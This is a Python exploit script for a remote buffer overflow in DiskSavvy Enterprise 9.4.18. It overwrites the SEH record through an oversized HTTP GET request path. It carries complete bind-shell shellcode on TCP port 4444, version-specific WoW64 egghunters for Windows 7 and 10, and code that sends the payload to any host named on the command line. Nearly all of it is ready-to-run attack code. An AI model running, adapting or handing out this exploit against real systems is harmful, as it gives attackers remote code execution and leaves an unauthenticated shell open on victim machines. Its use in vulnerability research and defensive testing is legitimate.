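# Exploit Title: DiskSavvy Enterprise 9.4.18 - Remote buffer overflow - SEH overwrite with WoW64 egghunters
# Date: 2017-02-22
# Exploit Author: Peter Baris
# Vendor Homepage: www.saptech-erp.com.au
# Software Link: http://www.disksavvy.com/downloads.html
# Version: 9.4.18
# Tested on: Windows 7 Pro SP1 x64 (fully patched) and Windows 10 Pro x64
# WoW64 egghunters are in use in this exploit, meaning it will work on specific 64bit operating systems
# Original Win7 egghunter: https://www.corelan.be/index.php/2011/11/18/wow64-egghunter/ - but I modified it for this exploit
# Win10 WoW64 egghunter only supports x86_64 platform - developed by Peter Baris based on corelan's Win7 version
# If you require a WoW64 egghunter for additional windows versions, contact me through my website http://saptech-erp.com.au/services.php
#
# Usage: dsavvy.py <host> win7|win10 [port]
#
# The payload is carried in the request path of a single HTTP GET; everything
# below is built as bytes so the script runs unchanged on Python 2.7 and 3.x.

import socket
import sys
from contextlib import closing

# Port the DiskSavvy web interface listens on unless overridden on the command line.
DEFAULT_PORT = 80

# 355 bytes bind shell, PORT 4444, bad chars \x09\x0a\x0d\x20
# NOTE(review): a bind shell leaves an unauthenticated listener on tcp/4444 of the
# target; anyone who can reach that port gets the shell, not only the operator.
shell = (b"\xba\x6c\xb1\x12\x02\xd9\xc7\xd9\x74\x24\xf4\x5e\x33\xc9\xb1"
         b"\x53\x83\xee\xfc\x31\x56\x0e\x03\x3a\xbf\xf0\xf7\x3e\x57\x76"
         b"\xf7\xbe\xa8\x17\x71\x5b\x99\x17\xe5\x28\x8a\xa7\x6d\x7c\x27"
         b"\x43\x23\x94\xbc\x21\xec\x9b\x75\x8f\xca\x92\x86\xbc\x2f\xb5"
         b"\x04\xbf\x63\x15\x34\x70\x76\x54\x71\x6d\x7b\x04\x2a\xf9\x2e"
         b"\xb8\x5f\xb7\xf2\x33\x13\x59\x73\xa0\xe4\x58\x52\x77\x7e\x03"
         b"\x74\x76\x53\x3f\x3d\x60\xb0\x7a\xf7\x1b\x02\xf0\x06\xcd\x5a"
         b"\xf9\xa5\x30\x53\x08\xb7\x75\x54\xf3\xc2\x8f\xa6\x8e\xd4\x54"
         b"\xd4\x54\x50\x4e\x7e\x1e\xc2\xaa\x7e\xf3\x95\x39\x8c\xb8\xd2"
         b"\x65\x91\x3f\x36\x1e\xad\xb4\xb9\xf0\x27\x8e\x9d\xd4\x6c\x54"
         b"\xbf\x4d\xc9\x3b\xc0\x8d\xb2\xe4\x64\xc6\x5f\xf0\x14\x85\x37"
         b"\x35\x15\x35\xc8\x51\x2e\x46\xfa\xfe\x84\xc0\xb6\x77\x03\x17"
         b"\xb8\xad\xf3\x87\x47\x4e\x04\x8e\x83\x1a\x54\xb8\x22\x23\x3f"
         b"\x38\xca\xf6\xaa\x30\x6d\xa9\xc8\xbd\xcd\x19\x4d\x6d\xa6\x73"
         b"\x42\x52\xd6\x7b\x88\xfb\x7f\x86\x33\x12\xdc\x0f\xd5\x7e\xcc"
         b"\x59\x4d\x16\x2e\xbe\x46\x81\x51\x94\xfe\x25\x19\xfe\x39\x4a"
         b"\x9a\xd4\x6d\xdc\x11\x3b\xaa\xfd\x25\x16\x9a\x6a\xb1\xec\x4b"
         b"\xd9\x23\xf0\x41\x89\xc0\x63\x0e\x49\x8e\x9f\x99\x1e\xc7\x6e"
         b"\xd0\xca\xf5\xc9\x4a\xe8\x07\x8f\xb5\xa8\xd3\x6c\x3b\x31\x91"
         b"\xc9\x1f\x21\x6f\xd1\x1b\x15\x3f\x84\xf5\xc3\xf9\x7e\xb4\xbd"
         b"\x53\x2c\x1e\x29\x25\x1e\xa1\x2f\x2a\x4b\x57\xcf\x9b\x22\x2e"
         b"\xf0\x14\xa3\xa6\x89\x48\x53\x48\x40\xc9\x63\x03\xc8\x78\xec"
         b"\xca\x99\x38\x71\xed\x74\x7e\x8c\x6e\x7c\xff\x6b\x6e\xf5\xfa"
         b"\x30\x28\xe6\x76\x28\xdd\x08\x24\x49\xf4")

# Offset to the SEH record: 2487 bytes of padding put nseh/retn on top of it.
crash = b"\x41" * 2487
# 0x10142e38 pop edi pop esi ret  -- a hard-coded gadget address, so this only
# holds for the exact 9.4.18 binaries it was taken from (presumably a module
# without ASLR; confirm the gadget before re-using against another build).
retn = b"\x38\x2e\x14\x10"
# Pads the request so the overall length matches what the crash needs.
filler = b"\x44" * (2505 - 334 - 300 - 100)
# Next-SEH pointer: short jmp +8 hops over the handler address into the NOP sled.
nseh = b"\xeb\x08\x90\x90"
stack_fill = b"\x41" * 100
nops = b"\x90" * 8
# Egg tag the hunter scans for; both hunters compare against "t00w" (b8 74 30 30 77).
egg = b"t00wt00w"

# WoW64 egghunters keyed by the OS family given on the command line. The
# syscall numbers differ per Windows version, which is why each build gets
# its own hunter.
WOW64_EGGHUNTERS = {
    "win7": (b"\x66\x8c\xcb\x80\xfb\x23\x75\x08\x31\xdb\x53\x53\x53\x53\xb3\xc0"
             b"\x33\xd2"
             b"\x66\x81\xca\xff\x0f\x42\x52\x80\xfb\xc0\x74\x19\x6a\x02\x58\xcd"
             b"\x2e\x5a\x3c\x05\x74\xef\xb8"
             b"\x74\x30\x30\x77"
             b"\x89\xd7\xaf\x75\xe5\xaf\x75\xe2\xff\xe7\x6a\x26\x58\x31\xc9\x89"
             b"\xe2\x64\xff\x13\x5e\x5a\xeb\xdf"),
    "win10": (b"\x66\x8c\xcb\x80\xfb\x23\x75\x10\x31\xd2\x66\x81\xca\xff\x0f\x31"
              b"\xdb\x42\x52\x53\x53\x53\xb3\xc0\x80\xfb\xc0\x74\x13\x3c\x05\x74\xee\xb8"
              b"\x74\x30\x30\x77"
              b"\x89\xd7\xaf\x75\xe4\xaf\x75\xe1\xff\xe7"
              b"\x6a\x29\x58\x64\xff\x13\x83\xc4\x0c\x5a\xeb\xe1"),
}


def build_exploit(target_os):
    """Return the raw overflow string (bytes) for ``target_os``.

    ``target_os`` must be one of the keys of ``WOW64_EGGHUNTERS`` ("win7" or
    "win10"); any other value raises ``ValueError`` instead of sending a
    request with a hunter that cannot work on the target.
    """
    try:
        hunter = WOW64_EGGHUNTERS[target_os]
    except KeyError:
        raise ValueError("This windows version is not supported yet")
    # Layout: padding -> nSEH jmp -> SEH handler gadget -> NOP sled -> egghunter
    # -> stack filler -> egg tag -> NOP sled -> bind shell -> length filler.
    return (crash + nseh + retn + nops + hunter + stack_fill + egg + nops
            + shell + filler)


def build_request(host, target_os):
    """Return the complete HTTP request (bytes) that delivers the overflow.

    ``host`` may be ``str`` or ``bytes``; it is placed verbatim into the Host
    and Referer headers. Raises ``ValueError`` for an unsupported
    ``target_os`` (see ``build_exploit``).
    """
    exploit = build_exploit(target_os)
    host_b = host if isinstance(host, bytes) else host.encode("ascii")
    # The headers mirror the original trigger request. Note that a
    # Content-Length is announced but no body is ever sent; the overflow fires
    # on the request line, so the header is kept purely for fidelity.
    lines = [
        b"GET /" + exploit + b" HTTP/1.1",
        b"Host: " + host_b,
        b"User-Agent: Mozilla/5.0 (X11; Linux i686; rv:44.0) Gecko/20100101 Firefox/44.0 Iceweasel/44.0.2",
        b"Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8",
        b"Accept-Language: en-US,en;q=0.5",
        b"Accept-Encoding: gzip, deflate",
        b"Referer: http://" + host_b + b"/login",
        b"Connection: keep-alive",
        b"Content-Type: application/x-www-form-urlencoded",
        b"Content-Length: 5900",
    ]
    return b"\r\n".join(lines) + b"\r\n\r\n"


def send_request(host, port, payload):
    """Open a TCP connection to ``host:port`` and write ``payload`` in full.

    ``sendall`` is used rather than ``send`` so a partially written request
    (the payload is several KB) cannot silently truncate the overflow; the
    socket is always closed, even if connect or send raises.
    """
    with closing(socket.socket(socket.AF_INET, socket.SOCK_STREAM)) as sock:
        sock.connect((host, port))
        sock.sendall(payload)


def main(argv=None):
    """Command-line entry point; returns the process exit status (0 on success)."""
    argv = sys.argv if argv is None else argv
    if len(argv) < 3:
        print("[+] Usage: %s <host> win7/win10 [port]" % argv[0])
        print("[i] Example: dsavvy.py localhost win10")
        return 1
    host, target_os = argv[1], argv[2]
    port = int(argv[3]) if len(argv) > 3 else DEFAULT_PORT
    try:
        payload = build_request(host, target_os)
    except ValueError as exc:
        # Unsupported OS is a usage error, so exit non-zero (the original exited 0).
        print("[!] %s" % exc)
        return 1
    send_request(host, port, payload)
    return 0


if __name__ == "__main__":
    sys.exit(main())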